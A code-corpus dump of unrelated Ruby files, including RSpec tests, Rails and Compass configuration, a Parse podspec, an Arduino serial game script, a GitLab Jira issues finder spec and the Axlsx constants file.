it('will return 1 if the word the method is called on is the same as the word given as the argument') do
expect('path'.word_freq('path')).to(eq(1))
end
it('will return 0 if the word the method is called on is not the same as the word given as the argument') do
expect('path'.word_freq('street')).to(eq(0))
end
it('will return 1 if the word occurs once at the beginning of the sentence') do
expect('hello'.word_freq('Hello world')).to(eq(1))
end
it('will return 1 if the word occurs once anywhere in the sentence') do
expect('hello'.word_freq('World hello I am Ian')).to(eq(1))
end
it('will return the number of occurences of the word the method is called on within a sentence without punctuation') do
expect('path'.word_freq('Little red riding hood walked down the path and on that path she met me')).to(eq(2))
end
it('will return the number of occurences of the word the method is called on in a sentence containing punctuation') do
expect('path'.word_freq('Little red riding hood walked down the path, on that path she met a ...')).to(eq(2))
end
it('will return 0 occurences of the word if the method is called on a sentence containing punctuation and not the word') do
expect('path'.word_freq('There she was just walkin\' down the street. Singin\' \'Do wah diddy, diddy, dum diddy do')).to(eq(0))
end
it('will return the number of occurences of a word the method is called on in a sentence containing punctuation, even if it is contained in a contraction') do
expect('won'.word_freq('The camel won\'t stop spitting. Won\'t you ask him to stop? Because of his spitting, the dodgers won.')).to(eq(3))
end
it('will return the number of occurences of a contracted word the method is called on in a sentence containing punctuation') do
expect('won\'t'.word_freq('The camel won\'t stop spitting. Won\'t you ask him to stop? Because of his spitting, the dodgers won.')).to(eq(2))
end
end
| 61.424242 | 160 | 0.71929 |
613dca130a0016ee1b768b675804d0d4cf8aa549 | 851 | # Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "/"
css_dir = "css/generated"
sass_dir = "scss"
images_dir = "img"
javascripts_dir = "js"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.04 | 96 | 0.749706 |
5de980519a553098419ef76e0fb15e46c9363bc3 | 4,005 | Pod::Spec.new do |s|
s.name = 'Parse'
s.version = '1.11.0'
s.license = { :type => 'Commercial', :text => "See https://www.parse.com/about/terms" }
s.homepage = 'https://www.parse.com/'
s.summary = 'Parse is a complete technology stack to power your app\'s backend.'
s.authors = 'Parse'
s.source = { :git => "https://github.com/ParsePlatform/Parse-SDK-iOS-OSX.git", :tag => s.version.to_s }
s.platform = :ios, :osx, :tvos, :watchos
s.ios.deployment_target = '7.0'
s.osx.deployment_target = '10.9'
s.tvos.deployment_target = '9.0'
s.watchos.deployment_target = '2.0'
s.requires_arc = true
s.source_files = 'Parse/*.{h,m}',
'Parse/Internal/**/*.{h,m}'
s.public_header_files = 'Parse/*.h'
s.ios.exclude_files = 'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.osx.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFProduct.{h,m}',
'Parse/PFPurchase.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/Product/**/*.{h,m}',
'Parse/Internal/Purchase/**/*.{h,m}',
'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.tvos.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFPush.{h,m}',
'Parse/PFInstallation.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/Push/**/*.{h,m}',
'Parse/Internal/Installation/Controller/*.{h,m}',
'Parse/Internal/Installation/Constants/*.{h,m}',
'Parse/Internal/Installation/CurrentInstallationController/*.{h,m}',
'Parse/Internal/Installation/PFInstallationPrivate.h',
'Parse/Internal/Commands/PFRESTPushCommand.{h,m}'
s.watchos.exclude_files = 'Parse/PFNetworkActivityIndicatorManager.{h,m}',
'Parse/PFProduct.{h,m}',
'Parse/PFPurchase.{h,m}',
'Parse/PFPush.{h,m}',
'Parse/PFInstallation.{h,m}',
'Parse/Internal/PFAlertView.{h,m}',
'Parse/Internal/PFReachability.{h,m}',
'Parse/Internal/Product/**/*.{h,m}',
'Parse/Internal/Purchase/**/*.{h,m}',
'Parse/Internal/Push/**/*.{h,m}',
'Parse/Internal/Installation/Controller/*.{h,m}',
'Parse/Internal/Installation/Constants/*.{h,m}',
'Parse/Internal/Installation/CurrentInstallationController/*.{h,m}',
'Parse/Internal/Installation/PFInstallationPrivate.h',
'Parse/Internal/Commands/PFRESTPushCommand.{h,m}',
'Parse/Internal/PFMemoryEventuallyQueue.{h,m}'
s.resources = 'Parse/Resources/en.lproj'
s.ios.frameworks = 'AudioToolbox',
'CFNetwork',
'CoreGraphics',
'CoreLocation',
'QuartzCore',
'Security',
'StoreKit',
'SystemConfiguration'
s.ios.weak_frameworks = 'Accounts',
'Social'
s.osx.frameworks = 'ApplicationServices',
'CFNetwork',
'CoreGraphics',
'CoreLocation',
'QuartzCore',
'Security',
'SystemConfiguration'
s.tvos.frameworks = 'CoreLocation',
'StoreKit',
'SystemConfiguration',
'Security'
s.libraries = 'z', 'sqlite3'
s.dependency 'Bolts/Tasks', '~> 1.5'
end
| 46.569767 | 115 | 0.485643 |
d59dbfc32abfe523453e3d67c421c1e4cd5caaba | 47 | module UpdateInBatches
VERSION = "0.0.2"
end
| 11.75 | 22 | 0.723404 |
1a1079fd8a0264e0f66cc61d3ddf3bf6d1c2d7b0 | 966 | ENV['RAILS_ENV'] ||= 'test'
require_relative '../config/environment'
require 'rails/test_help'
require "minitest/reporters"
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
include ApplicationHelper
# テストユーザーがログイン中の場合にtrueを返す
def is_logged_in?
!session[:user_id].nil?
end
# テストユーザーとしてログインする
def log_in_as(user)
session[:user_id] = user.id
end
end
class ActionDispatch::IntegrationTest
# テストユーザーとしてログインする
def log_in_as(user, password: 'password', remember_me: '1')
post login_path, params: { session: { email: user.email,
password: password,
remember_me: remember_me } }
end
end
| 25.421053 | 82 | 0.674948 |
7a90244a3622c3083ffb62868a03c01b82c38aa1 | 13,578 | module Axlsx
# XML Encoding
ENCODING = "UTF-8".freeze
# spreadsheetML namespace
XML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main".freeze
# content-types namespace
XML_NS_T = "http://schemas.openxmlformats.org/package/2006/content-types".freeze
# extended-properties namespace
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties".freeze
# doc props namespace
APP_NS_VT = "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes".freeze
# core properties namespace
CORE_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties".freeze
# dc elements (core) namespace
CORE_NS_DC = "http://purl.org/dc/elements/1.1/".freeze
# dcmit (core) namespcace
CORE_NS_DCMIT = "http://purl.org/dc/dcmitype/".freeze
# dc terms namespace
CORE_NS_DCT = "http://purl.org/dc/terms/".freeze
# xml schema namespace
CORE_NS_XSI = "http://www.w3.org/2001/XMLSchema-instance".freeze
# Digital signature namespace
DIGITAL_SIGNATURE_NS = "http://schemas.openxmlformats.org/package/2006/digital-signature".freeze
# spreadsheet drawing namespace
XML_NS_XDR = "http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing".freeze
# drawing namespace
XML_NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main".freeze
# chart namespace
XML_NS_C = "http://schemas.openxmlformats.org/drawingml/2006/chart".freeze
# relationships namespace
XML_NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships".freeze
# relationships name space
RELS_R = "http://schemas.openxmlformats.org/package/2006/relationships".freeze
# table rels namespace
TABLE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/table".freeze
# pivot table rels namespace
PIVOT_TABLE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotTable".freeze
# pivot table cache definition namespace
PIVOT_TABLE_CACHE_DEFINITION_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotCacheDefinition".freeze
# workbook rels namespace
WORKBOOK_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument".freeze
# worksheet rels namespace
WORKSHEET_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet".freeze
# app rels namespace
APP_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties".freeze
# core rels namespace
CORE_R = "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties".freeze
# digital signature rels namespace
DIGITAL_SIGNATURE_R = "http://schemas.openxmlformats.org/package/2006/relationships/digital- signature/signature".freeze
# styles rels namespace
STYLES_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles".freeze
# shared strings namespace
SHARED_STRINGS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings".freeze
# drawing rels namespace
DRAWING_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing".freeze
# chart rels namespace
CHART_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart".freeze
# image rels namespace
IMAGE_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image".freeze
# hyperlink rels namespace
HYPERLINK_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink".freeze
# comment rels namespace
COMMENT_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments".freeze
# comment relation for nil target
COMMENT_R_NULL = "http://purl.oclc.org/ooxml/officeDocument/relationships/comments".freeze
# vml drawing relation namespace
VML_DRAWING_R = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing'
# VML Drawing content type
VML_DRAWING_CT = "application/vnd.openxmlformats-officedocument.vmlDrawing".freeze
# table content type
TABLE_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.table+xml".freeze
# pivot table content type
PIVOT_TABLE_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.pivotTable+xml".freeze
# pivot table cache definition content type
PIVOT_TABLE_CACHE_DEFINITION_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.pivotCacheDefinition+xml".freeze
# workbook content type
WORKBOOK_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml".freeze
# app content type
APP_CT = "application/vnd.openxmlformats-officedocument.extended-properties+xml".freeze
# rels content type
RELS_CT = "application/vnd.openxmlformats-package.relationships+xml".freeze
# styles content type
STYLES_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml".freeze
# xml content type
XML_CT = "application/xml".freeze
# worksheet content type
WORKSHEET_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml".freeze
# shared strings content type
SHARED_STRINGS_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml".freeze
# core content type
CORE_CT = "application/vnd.openxmlformats-package.core-properties+xml".freeze
# digital signature xml content type
DIGITAL_SIGNATURE_XML_CT = "application/vnd.openxmlformats-package.digital-signature-xmlsignature+xml".freeze
# digital signature origin content type
DIGITAL_SIGNATURE_ORIGIN_CT = "application/vnd.openxmlformats-package.digital-signature-origin".freeze
# digital signature certificate content type
DIGITAL_SIGNATURE_CERTIFICATE_CT = "application/vnd.openxmlformats-package.digital-signature-certificate".freeze
# chart content type
CHART_CT = "application/vnd.openxmlformats-officedocument.drawingml.chart+xml".freeze
# comments content type
COMMENT_CT = "application/vnd.openxmlformats-officedocument.spreadsheetml.comments+xml".freeze
# jpeg content type
JPEG_CT = "image/jpeg".freeze
# gif content type
GIF_CT = "image/gif".freeze
# png content type
PNG_CT = "image/png".freeze
# drawing content type
DRAWING_CT = "application/vnd.openxmlformats-officedocument.drawing+xml".freeze
# xml content type extensions
XML_EX = "xml".freeze
# jpeg extension
JPEG_EX = "jpeg".freeze
# gif extension
GIF_EX = "gif".freeze
# png extension
PNG_EX = "png".freeze
# rels content type extension
RELS_EX = "rels".freeze
# workbook part
WORKBOOK_PN = "xl/workbook.xml".freeze
# styles part
STYLES_PN = "styles.xml".freeze
# shared_strings part
SHARED_STRINGS_PN = "sharedStrings.xml".freeze
# app part
APP_PN = "docProps/app.xml".freeze
# core part
CORE_PN = "docProps/core.xml".freeze
# content types part
CONTENT_TYPES_PN = "[Content_Types].xml".freeze
# rels part
RELS_PN = "_rels/.rels".freeze
# workbook rels part
WORKBOOK_RELS_PN = "xl/_rels/workbook.xml.rels".freeze
# worksheet part
WORKSHEET_PN = "worksheets/sheet%d.xml".freeze
# worksheet rels part
WORKSHEET_RELS_PN = "worksheets/_rels/sheet%d.xml.rels".freeze
# drawing part
DRAWING_PN = "drawings/drawing%d.xml".freeze
# drawing rels part
DRAWING_RELS_PN = "drawings/_rels/drawing%d.xml.rels".freeze
# vml drawing part
VML_DRAWING_PN = "drawings/vmlDrawing%d.vml".freeze
# drawing part
TABLE_PN = "tables/table%d.xml".freeze
# pivot table parts
PIVOT_TABLE_PN = "pivotTables/pivotTable%d.xml".freeze
# pivot table cache definition part name
PIVOT_TABLE_CACHE_DEFINITION_PN = "pivotCache/pivotCacheDefinition%d.xml".freeze
# pivot table rels parts
PIVOT_TABLE_RELS_PN = "pivotTables/_rels/pivotTable%d.xml.rels".freeze
# chart part
CHART_PN = "charts/chart%d.xml".freeze
# chart part
IMAGE_PN = "media/image%d.%s".freeze
# comment part
COMMENT_PN = "comments%d.xml".freeze
# location of schema files for validation
SCHEMA_BASE = (File.dirname(__FILE__) + '/../../schema/').freeze
# App validation schema
APP_XSD = (SCHEMA_BASE + "shared-documentPropertiesExtended.xsd").freeze
# core validation schema
CORE_XSD = (SCHEMA_BASE + "opc-coreProperties.xsd").freeze
# content types validation schema
CONTENT_TYPES_XSD = (SCHEMA_BASE + "opc-contentTypes.xsd").freeze
# rels validation schema
RELS_XSD = (SCHEMA_BASE + "opc-relationships.xsd").freeze
# spreadsheetML validation schema
SML_XSD = (SCHEMA_BASE + "sml.xsd").freeze
# drawing validation schema
DRAWING_XSD = (SCHEMA_BASE + "dml-spreadsheetDrawing.xsd").freeze
# number format id for pecentage formatting using the default formatting id.
NUM_FMT_PERCENT = 9
# number format id for date format like 2011/11/13
NUM_FMT_YYYYMMDD = 100
# number format id for time format the creates 2011/11/13 12:23:10
NUM_FMT_YYYYMMDDHHMMSS = 101
# cellXfs id for thin borders around the cell
STYLE_THIN_BORDER = 1
# cellXfs id for default date styling
STYLE_DATE = 2
# error messages RestrictionValidor
ERR_RESTRICTION = "Invalid Data: %s. %s must be one of %s.".freeze
# error message DataTypeValidator
ERR_TYPE = "Invalid Data %s for %s. must be %s.".freeze
# error message for RegexValidator
ERR_REGEX = "Invalid Data. %s does not match %s.".freeze
# error message for RangeValidator
ERR_RANGE = "Invalid Data. %s must be between %s and %s, (inclusive:%s) you gave: %s".freeze
# error message for sheets that use a name which is longer than 31 bytes
ERR_SHEET_NAME_TOO_LONG = "Your worksheet name '%s' is too long. Worksheet names must be 31 characters (bytes) or less".freeze
# error message for sheets that use a name which include invalid characters
ERR_SHEET_NAME_CHARACTER_FORBIDDEN = "Your worksheet name '%s' contains a character which is not allowed by MS Excel and will cause repair warnings. Please change the name of your sheet.".freeze
# error message for duplicate sheet names
ERR_DUPLICATE_SHEET_NAME = "There is already a worksheet in this workbook named '%s'. Please use a unique name".freeze
# error message when user does not provide color and or style options for border in Style#add_sytle
ERR_INVALID_BORDER_OPTIONS = "border hash must include both style and color. e.g. :border => { :color => 'FF000000', :style => :thin }. You provided: %s".freeze
# error message for invalid border id reference
ERR_INVALID_BORDER_ID = "The border id you specified (%s) does not exist. Please add a border with Style#add_style before referencing its index.".freeze
# error message for invalid angles
ERR_ANGLE = "Angles must be a value between -90 and 90. You provided: %s".freeze
# error message for non 'integerish' value
ERR_INTEGERISH = "You value must be, or be castable via to_i, an Integer. You provided %s".freeze
# Regex to match forbidden control characters
# The following will be automatically stripped from worksheets.
#
# x00 Null
# x01 Start Of Heading
# x02 Start Of Text
# x03End Of Text
# x04 End Of Transmission
# x05 Enquiry
# x06 Acknowledge
# x07 Bell
# x08 Backspace
# x0B Line Tabulation
# x0C Form Feed
# x0E Shift Out
# x0F Shift In
# x10 Data Link Escape
# x11 Device Control One
# x12 Device Control Two
# x13 Device Control Three
# x14 Device Control Four
# x15 Negative Acknowledge
# x16 Synchronous Idle
# x17 End Of Transmission Block
# x18 Cancel
# x19 End Of Medium
# x1A Substitute
# x1B Escape
# x1C Information Separator Four
# x1D Information Separator Three
# x1E Information Separator Two
# x1F Information Separator One
#
# The following are not dealt with.
# If you have this in your data, expect excel to blow up!
#
# x7F Delete
# x80 Control 0080
# x81 Control 0081
# x82 Break Permitted Here
# x83 No Break Here
# x84 Control 0084
# x85 Next Line (Nel)
# x86 Start Of Selected Area
# x87 End Of Selected Area
# x88 Character Tabulation Set
# x89 Character Tabulation With Justification
# x8A Line Tabulation Set
# x8B Partial Line Forward
# x8C Partial Line Backward
# x8D Reverse Line Feed
# x8E Single Shift Two
# x8F Single Shift Three
# x90 Device Control String
# x91 Private Use One
# x92 Private Use Two
# x93 Set Transmit State
# x94 Cancel Character
# x95 Message Waiting
# x96 Start Of Guarded Area
# x97 End Of Guarded Area
# x98 Start Of String
# x99 Control 0099
# x9A Single Character Introducer
# x9B Control Sequence Introducer
# x9C String Terminator
# x9D Operating System Command
# x9E Privacy Message
# x9F Application Program Command
#
# The following are allowed:
#
# x0A Line Feed (Lf)
# x0D Carriage Return (Cr)
# x09 Character Tabulation
# @see http://www.codetable.net/asciikeycodes
pattern = "\x0-\x08\x0B\x0C\x0E-\x1F"
pattern = pattern.respond_to?(:encode) ? pattern.encode('UTF-8') : pattern
# The regular expression used to remove control characters from worksheets
CONTROL_CHARS = pattern.freeze
# ISO 8601 date recognition
ISO_8601_REGEX = /\A(-?(?:[1-9][0-9]*)?[0-9]{4})-(1[0-2]|0[1-9])-(3[0-1]|0[1-9]|[1-2][0-9])T(2[0-3]|[0-1][0-9]):([0-5][0-9]):([0-5][0-9])(\.[0-9]+)?(Z|[+-](?:2[0-3]|[0-1][0-9]):[0-5][0-9])?\Z/.freeze
# FLOAT recognition
FLOAT_REGEX = /\A[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?\Z/.freeze
# Numeric recognition
NUMERIC_REGEX = /\A[+-]?\d+?\Z/.freeze
end
| 34.030075 | 201 | 0.745986 |
91a6ad1f178d64cec805a8f72e5b71d6e3b83d10 | 205 | class RemoveTwitterHandleFromCongressMembers < ActiveRecord::Migration[5.1]
def change
remove_columns :congress_members, :twitter_handle, :twitter_picture_url, :member_profile_response_api
end
end
| 34.166667 | 105 | 0.834146 |
01cbba229deefe037f24828dd34d4b9f6a77d8a6 | 2,568 | #simplest ruby program to read from arduino serial,
#using the SerialPort gem
#(http://rubygems.org/gems/serialport)
require "serialport"
#params for serial port
port_str = "COM3" #may be different for you
# NOTE(review): baud rate presumably matches Serial.begin(115200) in the
# Arduino sketch — confirm against the firmware.
baud_rate = 115200
data_bits = 8
stop_bits = 1
parity = SerialPort::NONE
# Global serial handle shared by the game helpers and the main loop below.
$port = SerialPort.new(port_str, baud_rate, data_bits, stop_bits, parity)
# Morse-code game: decodes a space-separated Morse question (e.g. ".- -...")
# into letters/digits and writes the decoded answer, newline-terminated, back
# over the serial port. Does nothing when ques is nil.
def game0(ques)
  if ques
    morse = {
      ".-" => "A", "-..." => "B", "-.-." => "C", "-.." => "D",
      "." => "E", "..-." => "F", "--." => "G", "...." => "H",
      ".." => "I", ".---" => "J", "-.-" => "K", ".-.." => "L",
      "--" => "M", "-." => "N", "---" => "O", ".--." => "P",
      "--.-" => "Q", ".-." => "R", "..." => "S", "-" => "T",
      "..-" => "U", "...-" => "V", ".--" => "W", "-..-" => "X",
      "-.--" => "Y", "--.." => "Z",
      "-----" => "0", ".----" => "1", "..---" => "2", "...--" => "3",
      "....-" => "4", "....." => "5", "-...." => "6", "--..." => "7",
      "---.." => "8", "----." => "9"
    }
    # Decode each code group and concatenate (unknown groups decode to nil,
    # which Array#join drops — same as the original accumulator loop).
    answer = ques.split(' ').map { |code| morse[code] }.join('')
    $port.write("#{answer}\n")
    $port.flush()
  end
end
# Maze game: replies with one uniformly random movement key (w/s/a/d),
# newline-terminated, whenever a prompt line is received. Does nothing when
# ques is nil.
def game1(ques)
  if ques
    moves = ['w', 's', 'a', 'd']
    pick = Random.new.rand(moves.length)
    $port.write("#{moves[pick]}\n")
    $port.flush()
  end
end
# Calculator game: evaluates an arithmetic question received over the serial
# line and writes the result back, newline-terminated.
#
# SECURITY: the question arrives from an external device, so feeding it to
# Kernel#eval unchecked would allow arbitrary code execution. The expression
# is therefore whitelisted to digits, arithmetic operators, parentheses and
# whitespace before evaluation; anything else raises ArgumentError.
def game2(ques)
  if ques
    unless ques =~ %r{\A[0-9+\-*/%().\s]+\z}
      raise ArgumentError, "unsafe expression: #{ques.inspect}"
    end
    answer = eval(ques)
    $port.write("#{answer}\n")
    $port.flush()
  end
end
# Main protocol loop: reads prompt lines from the board, answers the game
# selection prompt with `choice`, and dispatches game-specific prompts to the
# helpers above. Exits when the board reports 'Nano$ finish'.
choice = '1'
sleep 2 # give the board time to boot before talking to it

loop do
  $port.read_timeout = 20
  while (line = $port.readline)
    puts line
    line = line[0..-2] if line # strip the trailing newline

    if line == 'Nano$ enter your choice:'
      $port.write("#{choice}\n")
      $port.flush()
    end

    if line == 'Nano$ finish'
      $port.close()
      break
    end

    case choice
    when '0'
      if line == 'Nano$ activate Morse'
        ques = $port.readline
        puts ques
        ques = ques[6..-2] # drop the 6-char 'Nano$ ' prefix and the newline
        line = $port.readline
        puts line
        game0(ques)
      end
    when '1'
      sleep 2 if line == 'Nano$ send [a] to move left' # wait generate map
      game1(line) if line == 'Nano$ show map'
    when '2'
      if line == 'Nano$ activate Calculator'
        ques = $port.readline
        puts ques
        ques = ques[6..-5] # drop the 'Nano$ ' prefix and the question suffix
        line = $port.readline
        puts line
        game2(ques)
      end
    end
  end
  break
end
| 20.380952 | 74 | 0.408879 |
e2b8898d05180b37059b42f93f1611ed2806cb37 | 823 | module Spree
module ParanoiaDeprecations
def paranoia_destroy
Spree::Deprecation.warn <<-WARN.strip_heredoc, caller
Calling #destroy (or #paranoia_destroy) on a #{self.class} currently performs a soft-destroy using the paranoia gem.
In Solidus 3.0, paranoia will be removed, and this will perform a HARD destroy instead. To continue soft-deleting, use #discard instead.
WARN
super
end
def paranoia_delete
Spree::Deprecation.warn <<-WARN.strip_heredoc, caller
Calling #delete (or #paranoia_delete) on a #{self.class} currently performs a soft-destroy using the paranoia gem.
In Solidus 3.0, paranoia will be removed, and this will perform a HARD destroy instead. To continue soft-deleting, use #discard instead.
WARN
super
end
end
end
| 41.15 | 144 | 0.714459 |
62e0d711bb9b5c6ee6919500ee46e39eb9007549 | 4,606 | # frozen_string_literal: true
require 'spec_helper'
# Exercises Projects::Integrations::Jira::IssuesFinder: the licensed-feature
# gate, integration misconfiguration errors, Jira API failure/success paths,
# and the mapping of sort/pagination params into JqlBuilderService.
RSpec.describe Projects::Integrations::Jira::IssuesFinder do
  let_it_be(:project, refind: true) { create(:project) }
  let_it_be(:jira_service, reload: true) { create(:jira_service, project: project) }
  let(:params) { {} }
  let(:service) { described_class.new(project, params) }
  before do
    # Jira issue lists are a licensed feature; enabled for most contexts below.
    stub_licensed_features(jira_issues_integration: true)
  end
  describe '#execute' do
    subject(:issues) { service.execute }
    context 'when jira service integration does not have project_key' do
      it 'raises error' do
        expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::IntegrationError, 'Jira project key is not configured')
      end
    end
    context 'when jira service integration is not active' do
      before do
        jira_service.update!(active: false)
      end
      it 'raises error' do
        expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::IntegrationError, 'Jira service not configured.')
      end
    end
    context 'when jira service integration has project_key' do
      # NOTE(review): duplicates the outer `let(:params)` definition — redundant.
      let(:params) { {} }
      let(:client) { double(options: { site: 'https://jira.example.com' }) }
      before do
        jira_service.update!(project_key: 'TEST')
        # Stub the Jira client on the request service so no real HTTP happens.
        expect_next_instance_of(Jira::Requests::Issues::ListService) do |instance|
          expect(instance).to receive(:client).at_least(:once).and_return(client)
        end
      end
      context 'when Jira API request fails' do
        before do
          expect(client).to receive(:get).and_raise(Timeout::Error)
        end
        it 'raises error', :aggregate_failures do
          expect { subject }.to raise_error(Projects::Integrations::Jira::IssuesFinder::RequestError)
        end
      end
      context 'when Jira API request succeeds' do
        before do
          expect(client).to receive(:get).and_return(
            {
              "total" => 375,
              "startAt" => 0,
              "issues" => [{ "key" => 'TEST-1' }, { "key" => 'TEST-2' }]
            }
          )
        end
        it 'return service response with issues', :aggregate_failures do
          expect(issues.size).to eq 2
          expect(service.total_count).to eq 375
          expect(issues.map(&:key)).to eq(%w[TEST-1 TEST-2])
        end
        context 'when sorting' do
          # Asserts the finder translates its sort param into the
          # (sort, sort_direction) pair handed to JqlBuilderService.
          shared_examples 'maps sort values' do
            it do
              expect(::Jira::JqlBuilderService).to receive(:new)
                .with(jira_service.project_key, expected_sort_values)
                .and_call_original
              subject
            end
          end
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'created_date' } }
            let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
          end
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'created_desc' } }
            let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
          end
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'created_asc' } }
            let(:expected_sort_values) { { sort: 'created', sort_direction: 'ASC' } }
          end
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'updated_desc' } }
            let(:expected_sort_values) { { sort: 'updated', sort_direction: 'DESC' } }
          end
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'updated_asc' } }
            let(:expected_sort_values) { { sort: 'updated', sort_direction: 'ASC' } }
          end
          # Unknown sort values fall back to created DESC.
          it_behaves_like 'maps sort values' do
            let(:params) { { sort: 'unknown_sort' } }
            let(:expected_sort_values) { { sort: 'created', sort_direction: 'DESC' } }
          end
        end
        context 'when pagination params used' do
          let(:params) { { page: '10', per_page: '20' } }
          it 'passes them to JqlBuilderService' do
            expect(::Jira::JqlBuilderService).to receive(:new)
              .with(jira_service.project_key, include({ page: '10', per_page: '20' }))
              .and_call_original
            subject
          end
        end
      end
    end
    context 'when jira_issues_integration licensed feature is not available' do
      it 'exits early and returns no issues' do
        stub_licensed_features(jira_issues_integration: false)
        expect(issues.size).to eq 0
        expect(service.total_count).to be_nil
      end
    end
  end
end
| 33.136691 | 141 | 0.594225 |
6288673ca68ced24731eade827ec4ab6a9c51b4f | 1,710 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
# NOTE: schema.rb is regenerated by `rails db:schema:dump`; comments added
# here will be lost on the next dump.
ActiveRecord::Schema.define(version: 2022_02_06_001140) do
  # Categories belong to a user (user_id NOT NULL, FK added below).
  create_table "categories", force: :cascade do |t|
    t.string "name"
    t.integer "user_id", null: false
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
    t.index ["user_id"], name: "index_categories_on_user_id"
  end
  # Goals belong to a category (category_id NOT NULL, FK added below).
  create_table "goals", force: :cascade do |t|
    t.string "name"
    t.integer "category_id", null: false
    t.string "cadence"
    t.integer "frequency"
    t.string "importance"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
    t.index ["category_id"], name: "index_goals_on_category_id"
  end
  create_table "users", force: :cascade do |t|
    t.string "name"
    t.string "email"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  add_foreign_key "categories", "users"
  add_foreign_key "goals", "categories"
end
| 38.863636 | 86 | 0.730409 |
5de5339b70e6a3d30b8413703f069beee8cef3e5 | 6,057 | require './spec/support/sidekiq'
# Seeds demo CI pipelines — builds with artifacts and logs, plus external
# (generic) job statuses — for development/seed data.
class Gitlab::Seeder::Pipelines
  STAGES = %w[build test deploy notify]
  # Attribute templates for the builds created on every seeded pipeline.
  BUILDS = [
    # build stage
    { name: 'build:linux', stage: 'build', status: :success,
      queued_at: 10.hour.ago, started_at: 9.hour.ago, finished_at: 8.hour.ago },
    { name: 'build:osx', stage: 'build', status: :success,
      queued_at: 10.hour.ago, started_at: 10.hour.ago, finished_at: 9.hour.ago },
    # test stage
    { name: 'rspec:linux 0 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'rspec:linux 1 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'rspec:linux 2 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'rspec:windows 0 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'rspec:windows 1 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
    { name: 'rspec:windows 2 3', stage: 'test', status: :success,
      queued_at: 8.hour.ago, started_at: 8.hour.ago, finished_at: 7.hour.ago },
